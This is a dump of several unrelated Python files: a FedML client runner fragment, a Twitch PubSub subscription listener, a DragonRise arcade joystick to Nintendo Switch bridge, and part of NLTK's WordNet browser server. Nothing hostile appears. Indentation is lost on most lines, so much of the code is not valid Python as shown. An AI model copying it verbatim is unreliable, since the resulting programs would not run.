@staticmethod
def get_package_download_dir():
package_download_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(),
LOCAL_PACKAGE_HOME_DIR_NAME)
return package_download_dir
@staticmethod
def get_package_unzip_dir():
package_unzip_dir = FedMLClientRunner.get_package_download_dir()
return package_unzip_dir
@staticmethod
def get_package_run_dir(package_name):
package_file_no_extension = str(package_name).split('.')[0]
package_run_dir = os.path.join(FedMLClientRunner.get_package_unzip_dir(),
package_file_no_extension)
return package_run_dir
@staticmethod
def cleanup_run_process():
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-sub-process.id")
process_info = load_yaml_config(process_id_file)
process_id = process_info.get('process_id', None)
if process_id is not None:
try:
process = psutil.Process(process_id)
for sub_process in process.children():
os.kill(sub_process.pid, signal.SIGTERM)
if process is not None:
os.kill(process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_run_process(process_id):
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-sub-process.id")
yaml_object = {}
yaml_object['process_id'] = process_id
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def cleanup_learning_process():
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-learning-process.id")
process_info = load_yaml_config(process_id_file)
process_id = process_info.get('process_id', None)
if process_id is not None:
try:
process = psutil.Process(process_id)
for sub_process in process.children():
os.kill(sub_process.pid, signal.SIGTERM)
if process is not None:
os.kill(process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_learning_process(learning_id):
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-learning-process.id")
yaml_object = {}
yaml_object['process_id'] = learning_id
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_runner_infos(unique_device_id, edge_id, run_id=None):
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
try:
os.makedirs(local_pkg_data_dir)
except Exception as e:
pass
try:
os.makedirs(os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME))
except Exception as e:
pass
runner_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner_infos.yaml")
running_info = dict()
running_info["unique_device_id"] = str(unique_device_id)
running_info["edge_id"] = str(edge_id)
running_info["run_id"] = run_id
FedMLClientRunner.generate_yaml_doc(running_info, runner_info_file)
@staticmethod
def save_training_infos(edge_id, training_status):
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
try:
os.makedirs(local_pkg_data_dir)
except Exception as e:
pass
try:
os.makedirs(os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME))
except Exception as e:
pass
training_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "training_infos.yaml")
training_info = dict()
training_info["edge_id"] = edge_id
training_info["training_status"] = str(training_status)
FedMLClientRunner.generate_yaml_doc(training_info, training_info_file)
@staticmethod
def get_training_infos():
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
training_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "training_infos.yaml")
training_info = dict()
training_info["edge_id"] = 0
training_info["training_status"] = "INITIALIZING"
try:
training_info = load_yaml_config(training_info_file)
except Exception as e:
pass
return training_info
def callback_runner_id_status(self, topic, payload):
click.echo("callback_runner_id_status: topic = %s, payload = %s" % (topic, payload))
request_json = json.loads(payload)
run_id = request_json["run_id"]
edge_id = request_json["edge_id"]
status = request_json["status"]
self.save_training_status(edge_id, status)
if status == MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED:
click.echo("Received training finished message.")
click.echo("Stopping training client.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
multiprocessing.Process(target=client_runner.cleanup_client_with_finished_status).start()
def save_training_status(self, edge_id, training_status):
self.current_training_status = training_status
FedMLClientRunner.save_training_infos(edge_id, training_status)
@staticmethod
def get_device_id():
if "nt" in os.name:
def GetUUID():
cmd = 'wmic csproduct get uuid'
uuid = str(subprocess.check_output(cmd))
pos1 = uuid.find("\\n") + 2
uuid = uuid[pos1:-15]
return str(uuid)
device_id = str(GetUUID())
click.echo(device_id)
elif "posix" in os.name:
device_id = hex(uuid.getnode())
else:
            device_id = subprocess.check_output(
                "hal-get-property --udi /org/freedesktop/Hal/devices/computer --key system.hardware.uuid".split()
            ).decode().strip()
return device_id
def bind_account_and_device_id(self, url, account_id, device_id, os_name):
json_params = {"accountid": account_id, "deviceid": device_id, "type": os_name,
"gpu": "None", "processor": "", "network": ""}
_, cert_path = MLOpsConfigs.get_instance(self.args).get_request_params()
if cert_path is not None:
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
edge_id = response.json().get("data").get("id")
else:
return 0
return edge_id
def fetch_configs(self):
return MLOpsConfigs.get_instance(self.args).fetch_all_configs()
def setup_mqtt_connection(self, service_config):
# Setup MQTT connection
self.mqtt_mgr = MqttManager(
service_config["mqtt_config"]["BROKER_HOST"],
service_config["mqtt_config"]["BROKER_PORT"],
service_config["mqtt_config"]["MQTT_USER"],
service_config["mqtt_config"]["MQTT_PWD"],
service_config["mqtt_config"]["MQTT_KEEPALIVE"],
self.edge_id,
)
self.agent_config = service_config
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.mqtt_mgr)
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_IDLE)
# Setup MQTT message listener for starting training
topic_start_train = "flserver_agent/" + str(self.edge_id) + "/start_train"
self.mqtt_mgr.add_message_listener(topic_start_train, self.callback_start_train)
# Setup MQTT message listener for stopping training
topic_stop_train = "flserver_agent/" + str(self.edge_id) + "/stop_train"
self.mqtt_mgr.add_message_listener(topic_stop_train, self.callback_stop_train)
# Setup MQTT message listener for client status switching
topic_client_status = "fl_client/mlops/" + str(self.edge_id) + "/status"
self.mqtt_mgr.add_message_listener(topic_client_status, self.callback_runner_id_status)
def mqtt_loop(self):
# Start MQTT message loop
self.mqtt_mgr.loop_forever()
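
# Minimal standalone sketch of the ${FEDSYS.*} placeholder substitution performed in
# update_local_fedml_config(): each dynamic-argument value whose string starts with a
# placeholder key is rewritten with the realtime value from the server.
# `_substitute_constrain_variables_sketch` and the dictionaries in the example are
# hypothetical and for illustration only, not part of the FedML API.
def _substitute_constrain_variables_sketch(dynamic_args, constrain_variables):
    """Return a copy of dynamic_args with leading ${FEDSYS.*} placeholders resolved."""
    resolved = dict(dynamic_args)
    for key, value in constrain_variables.items():
        for arg_key, arg_value in resolved.items():
            if arg_value is not None and str(arg_value).find(key) == 0:
                resolved[arg_key] = str(arg_value).replace(key, str(value))
    return resolved
# Example:
# _substitute_constrain_variables_sketch(
#     {"data_cache_dir": "${FEDSYS.PRIVATE_LOCAL_DATA}"},
#     {"${FEDSYS.PRIVATE_LOCAL_DATA}": "/tmp/fedml_data"},
# ) -> {"data_cache_dir": "/tmp/fedml_data"}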
|
pubSubListener.py
|
import json
import random
import re
import threading
import time
from datetime import datetime
import websocket
from bts import codes # py file containing secret keys and ID info
from bts import settings
from bts.dataBaseClass import Sub
from bts.frontPanel import LED_Blue
#to get user id: https://api.twitch.tv/kraken/users/<name>?client_id=apitoken
#to get channel id: https://api.twitch.tv/kraken/channels/<name>?client_id=apitoken
#user name vs display name:
#need to check if the display name has chars outside ^[a-zA-Z0-9_]{4,25}$; if so, use the username instead
pingstarttime = 0
pingTwitch = 0
SUBdidWork = 0
twitchOAuthToken = codes.twitchOAuth # this is generated at https://twitchapps.com/tokengen/ with scope "channel_subscriptions" and the api token from the dev dashboard
channelID = codes.channelID #oh_bother number code
userID = settings.pubSubUserId #lebtvlive
#e4t5v345nz3sm is just a unique code we set to check for in the return from twitch
#listenrequest = {"type": "LISTEN", "nonce": "e4t5v345nz3sm", "data": { "topics": ["whispers." + userID], "auth_token": twitchOAuthToken}} #this is what i tested it with for whisper messages
listenrequest = {"type": "LISTEN", "nonce": "e4t5v345nz3sm", "data": { "topics": ["channel-subscribe-events-v1." + channelID], "auth_token": twitchOAuthToken}} #this is for sub events
ws1 = ""
#log file
loggies = settings.wsLogFile
def ws1_on_message(ws, message):
    global pingstarttime, SUBdidWork
    jsonReturn = json.loads(message)
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" raw message: ")
logOutput.write(message)
logOutput.write("\n")
logOutput.close()
if "type" in jsonReturn:
if jsonReturn["type"] == "PONG": #Take care of pong responses
pingstarttime = 0
print("PONG received")
LED_Blue.on()
elif jsonReturn["type"] == "RECONNECT": #Close if twitch tells us so and reconnect
print(jsonReturn)
try:
ws.close()
except:
pass
elif jsonReturn["type"] == "RESPONSE": #We get this as a response to our subToTopic request
if jsonReturn["nonce"] == "e4t5v345nz3sm" and jsonReturn["error"] == "": #validate this is the right response and there was no error
print("socket sub successful")
SUBdidWork = 1
else: #If there was something wrong
print(jsonReturn)
elif jsonReturn["type"] == "MESSAGE": #This is the message you get when an event itself happens
#print(jsonReturn["data"]["message"])
makeEntry(json.loads(jsonReturn["data"]["message"]))
else:
print(jsonReturn) #if there is anything else, just print it(shouldn't be the case)
def makeEntry(message):
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ")
logOutput.write(json.dumps(message))
logOutput.write('\n')
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
if 'recipient_user_name' in message.keys():
repName = message['recipient_display_name']
repUser = message['recipient_user_name']
if checkName(repName):
enterDb(repName)
logOutput.write("using repName: " + repName)
#print(repName)
else:
enterDb(repUser)
logOutput.write("using repUser: " + repUser)
#print(repUser)
else:
dispName = message['display_name']
usrName = message['user_name']
if checkName(dispName):
enterDb(dispName)
logOutput.write("using dispName: " + dispName)
#print(dispName)
else:
enterDb(usrName)
logOutput.write("using usrName: " + usrName)
#print("fuck you buddy")
logOutput.write("\n")
logOutput.close()
def checkName(name):
if re.search(r'[^a-zA-Z0-9_]', name):
return False
else:
return True
def enterDb(entry):
print("pubSub: entering " + entry)
dateInfo = datetime.utcnow()
dbEntry = Sub.create(
userName = entry,
entryTime = dateInfo
)
dbEntry.save()
def ws1_on_error(ws, error): #gets called when there was a websocket connection error
global pingTwitch, SUBdidWork
print (error)
pingTwitch = 0
SUBdidWork = 0
LED_Blue.blink()
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 error: ")
    logOutput.write(str(error))
logOutput.write("\n")
logOutput.close()
def ws1_on_close(ws): #gets called when the websocket connection was closed
global pingTwitch, SUBdidWork
print("### ws1 closed ###")
pingTwitch = 0
SUBdidWork = 0
LED_Blue.off()
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 closed\n")
logOutput.close()
def ws1_on_open(ws): #gets called when the websocket connection was opened (connected to the server and handshake successful)
global pingTwitch
print("### ws1 opened ###")
pingTwitch = 1
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 opened\n")
logOutput.close()
subToTopics()
def ws1_start(): #this is the main server loop
while True:
print("### ws1 restart ###")
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 restart\n")
logOutput.close()
ws1.run_forever()
def subToTopics(): #send our listen request
ws1.send(json.dumps(listenrequest))
def pingTwitchServersToKeepTheConnectionAliveTask(): #This PINGs the server every 4 minutes as per twitch api docs
    global pingstarttime
    while True:
        if pingTwitch:
            print("Pinging Twitch")
            ws1.send(json.dumps({"type": "PING"}))
            LED_Blue.off()
            pingstarttime = time.time() #the PONG handler resets this to 0 when a response arrives
            time.sleep(10) #wait 10 sec for ping response
            if pingstarttime: #if pingstarttime was not reset by a PONG, close the connection so it reconnects
                ws1.close()
        time.sleep(240 + random.randrange(-10, 10)) #Sleep 4 min +/- 10sec (random is required by twitch api)
def webSocketInit():
global ws1
print("pubSub started, opening socket")
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" pubSub Started\n")
logOutput.close()
ws1 = websocket.WebSocketApp("wss://pubsub-edge.twitch.tv", on_message = ws1_on_message, on_error = ws1_on_error, on_close = ws1_on_close) #Create Websocket Client Object
ws1.on_open = ws1_on_open
threading.Thread(target=ws1_start).start() #Start Websocket Thread
threading.Thread(target=pingTwitchServersToKeepTheConnectionAliveTask).start() # Start PING Thread
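
# Minimal standalone sketch of the PubSub LISTEN payload sent by subToTopics():
# a JSON message with a nonce, one or more topic strings and an OAuth token
# (the keepalive is just {"type": "PING"}). `build_listen_request_sketch` is a
# hypothetical helper for illustration only, and the arguments in the example
# below are placeholders, not real credentials.
def build_listen_request_sketch(channel_id, oauth_token, nonce="e4t5v345nz3sm"):
    """Return the JSON string for a channel-subscribe LISTEN request."""
    return json.dumps({
        "type": "LISTEN",
        "nonce": nonce,
        "data": {
            "topics": ["channel-subscribe-events-v1." + str(channel_id)],
            "auth_token": oauth_token,
        },
    })
# e.g. ws1.send(build_listen_request_sketch("12345678", "oauth_token_here")) would
# subscribe to sub events once the socket is open.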
if __name__ == "__main__":
webSocketInit() #webSocketInit() already starts the websocket and PING threads
|
nsgamepad_dragonrise.py
|
#!/usr/bin/python3
"""
Read from Dragon Rise Arcade Joystick and write to NSGadget.
DRAJ -> Raspberry Pi -> NSGadget -> Nintendo Switch
"""
import os
import time
from sys import exit
from struct import unpack
import threading
import array
from fcntl import ioctl
import serial
from nsgpadserial import NSGamepadSerial, NSButton, NSDPad
Nsg = NSGamepadSerial()
Nsg.begin(serial.Serial('/dev/ttyUSB0', 8*115200, timeout=0))
# Open the DRAJ
# joystick code based on https://gist.github.com/rdb/8864666
js_num = 0
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print('/dev/input/%s' % (fn))
jsdev = open('/dev/input/' + fn, 'rb')
buf = array.array('B', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tobytes().rstrip(b'\x00').decode('utf-8').upper()
print('Device name: %s' % js_name)
if 'DRAGONRISE INC. GENERIC USB JOYSTICK' in js_name:
js_num += 1
if js_num == 1:
js_left = jsdev
elif js_num == 2:
js_right = jsdev
else:
jsdev.close()
if js_num < 2:
print('DRAGONRISE joysticks not found')
exit(1)
print('DRAGONRISE joysticks found')
# Get number of axes and buttons
buf = array.array('B', [0])
ioctl(js_left, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(js_left, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
print('left num_axes = %s num_buttons = %s' % (num_axes, num_buttons))
# Get number of axes and buttons
buf = array.array('B', [0])
ioctl(js_right, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(js_right, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
print('right num_axes = %s num_buttons = %s' % (num_axes, num_buttons))
# Map DRAJ button numbers to NS gamepad buttons
# DRAJ buttons
# 0 = front trigger
# 1 = side thumb rest button
# 2 = top large left
# 3 = top large right
# 4 = top small left
# 5 = top small right
#
# Button array (2 rows, 3 columns) on base
#
# 7 9 11
# 6 8 10
#
BUTTON_MAP_LEFT = array.array('B', [
NSButton.LEFT_THROTTLE,
NSButton.LEFT_TRIGGER,
NSButton.MINUS,
255, # Up
255, # Right
255, # Down
255, # Left
NSButton.LEFT_STICK,
NSButton.CAPTURE,
NSButton.CAPTURE,
NSButton.CAPTURE,
NSButton.CAPTURE])
BUTTON_MAP_RIGHT = array.array('B', [
NSButton.RIGHT_THROTTLE,
NSButton.RIGHT_TRIGGER,
NSButton.PLUS,
NSButton.A,
NSButton.B,
NSButton.X,
NSButton.Y,
NSButton.RIGHT_STICK,
NSButton.HOME,
NSButton.HOME,
NSButton.HOME,
NSButton.HOME])
BUTTONS_MAP_DPAD = array.array('B', [
# LDRU
NSDPad.CENTERED, # 0000
NSDPad.UP, # 0001
NSDPad.RIGHT, # 0010
NSDPad.UP_RIGHT, # 0011
NSDPad.DOWN, # 0100
NSDPad.CENTERED, # 0101
NSDPad.DOWN_RIGHT, # 0110
NSDPad.CENTERED, # 0111
NSDPad.LEFT, # 1000
NSDPad.UP_LEFT, # 1001
NSDPad.CENTERED, # 1010
NSDPad.CENTERED, # 1011
NSDPad.DOWN_LEFT, # 1100
NSDPad.CENTERED, # 1101
NSDPad.CENTERED, # 1110
NSDPad.CENTERED # 1111
])
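# Worked example of the D-pad lookup below (illustrative): if the Up
# (button 3) and Right (button 4) switches are both pressed, dpad_bits
# becomes 0b0011 = 3, and BUTTONS_MAP_DPAD[3] is NSDPad.UP_RIGHT.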
def read_js_left():
dpad_bits = 0
while True:
evbuf_left = js_left.read(8)
if evbuf_left:
time, value, type, number = unpack('IhBB', evbuf_left)
if type & 0x01: # button event
button_out = BUTTON_MAP_LEFT[number]
if button_out == 255:
if value:
dpad_bits |= (1 << (number - 3))
else:
dpad_bits &= ~(1 << (number - 3))
Nsg.dPad(BUTTONS_MAP_DPAD[dpad_bits])
else:
if value:
Nsg.press(button_out)
else:
Nsg.release(button_out)
if type & 0x02: # axis event
# NS wants values 0..128..255 where 128 is center position
axis = ((value + 32767) >> 8)
if axis == 127:
axis = 128
# Axes 0,1 left stick X,Y
if number == 0:
Nsg.leftXAxis(axis)
elif number == 1:
Nsg.leftYAxis(axis)
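# Worked example of the axis scaling above: the kernel reports stick values
# in -32767..32767, and (value + 32767) >> 8 maps that onto 0..255. A
# centered stick (value 0) gives 32767 >> 8 = 127, which is nudged to 128,
# the neutral position NSGadget expects.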
def read_js_right():
while True:
evbuf_right = js_right.read(8)
if evbuf_right:
time, value, type, number = unpack('IhBB', evbuf_right)
if type & 0x01: # button event
button_out = BUTTON_MAP_RIGHT[number]
if value:
Nsg.press(button_out)
else:
Nsg.release(button_out)
if type & 0x02: # axis event
# NS wants values 0..128..255 where 128 is center position
axis = ((value + 32767) >> 8)
if axis == 127:
axis = 128
# Axes 0,1 right stick X,Y
if number == 0:
Nsg.rightXAxis(axis)
elif number == 1:
Nsg.rightYAxis(axis)
while True:
task_left = threading.Thread(target=read_js_left)
task_right = threading.Thread(target=read_js_right)
task_left.start()
task_right.start()
while True:
time.sleep(60)
|
wordnet_app.py
|
# Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database. It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients.
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file. If this option is not specified,
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shut down the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be developed to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from six.moves.urllib.parse import unquote_plus
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value of server_mode
# gets set by demo().
server_mode = None
# If set, this is a file object for writing log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == 'SHUTDOWN THE SERVER':
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print('Server shutting down!')
os._exit(0)
elif sp == '': # First request.
type = 'text/html'
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = 'green'
elif sp.endswith('.html'): # Trying to fetch an HTML file TODO:
type = 'text/html'
usp = unquote_plus(sp)
if usp == 'NLTK Wordnet Browser Database Info.html':
word = '* Database Info *'
if os.path.isfile(usp):
with open(usp, 'r') as infile:
page = infile.read()
else:
page = (
(html_header % word) + '<p>The database info file:'
'<p><b>'
+ usp
+ '</b>'
+ '<p>was not found. Run this:'
+ '<p><b>python dbinfo_html.py</b>'
+ '<p>to produce it.'
+ html_trailer
)
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = 'text/html'
parts = (sp.split("?")[1]).split("&")
word = [
p.split("=")[1].replace("+", " ")
for p in parts
if p.startswith("nextWord")
][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
# TODO add a variation of this that takes a non-encoded word or MWE.
type = 'text/html'
sp = sp[len("lookup_") :]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = 'text/html'
page, word = page_from_word("wordnet")
else:
type = 'text/plain'
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode('utf8'))
def send_head(self, type=None):
self.send_response(200)
self.send_header('Content-type', type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n"
% (self.address_string(), self.log_date_time_string(), format % args)
)
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
None.
"""
pos = sp.rfind('%23')
if pos != -1:
return int(sp[(pos + 3) :])
else:
return None
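# Illustrative example: for sp = 'lookup_abc%2342' the counter is whatever
# follows the URL-encoded '#' (%23), so the function returns 42; a path
# without '%23' yields None.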
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. They
# should ideally be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shuts down the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfeasible.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
sys.stderr.write("Couldn't open %s for writing: %s\n" % (logfilename, e))
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = 'http://localhost:' + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(('', port), MyServerHandler)
if logfile:
logfile.write('NLTK Wordnet browser server running, serving: %s\n' % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new=2, autoraise=1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN, 'N', 'noun'),
(wn.VERB, 'V', 'verb'),
(wn.ADJ, 'J', 'adj'),
(wn.ADV, 'R', 'adv'),
]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == 's':
pos_tuple = ('a', pos_tuple[1], pos_tuple[2])
for n, x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]:
return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas() if l.name() == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return (
(HYPONYM, 'Hyponyms', synset.hyponyms()),
(INSTANCE_HYPONYM, 'Instance hyponyms', synset.instance_hyponyms()),
(HYPERNYM, 'Direct hypernyms', synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM, 'Instance hypernyms', synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, 'Part holonyms', synset.part_holonyms()),
(PART_MERONYM, 'Part meronyms', synset.part_meronyms()),
(SUBSTANCE_HOLONYM, 'Substance holonyms', synset.substance_holonyms()),
(SUBSTANCE_MERONYM, 'Substance meronyms', synset.substance_meronyms()),
(MEMBER_HOLONYM, 'Member holonyms', synset.member_holonyms()),
(MEMBER_MERONYM, 'Member meronyms', synset.member_meronyms()),
(ATTRIBUTE, 'Attributes', synset.attributes()),
(ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.VERB:
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, 'Hyponym', synset.hyponyms()),
(HYPERNYM, 'Direct hypernyms', synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
(ENTAILMENT, 'Entailments', synset.entailments()),
(CAUSE, 'Causes', synset.causes()),
(ALSO_SEE, 'Also see', synset.also_sees()),
(VERB_GROUP, 'Verb Groups', synset.verb_groups()),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.ADJ or synset.pos() == wn.ADJ_SAT:
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, 'Similar to', synset.similar_tos()),
# Participle of verb - not supported by corpus
(
PERTAINYM,
'Pertainyms',
lemma_property(word, synset, lambda l: l.pertainyms()),
),
(ATTRIBUTE, 'Attributes', synset.attributes()),
(ALSO_SEE, 'Also see', synset.also_sees()),
)
elif synset.pos() == wn.ADV:
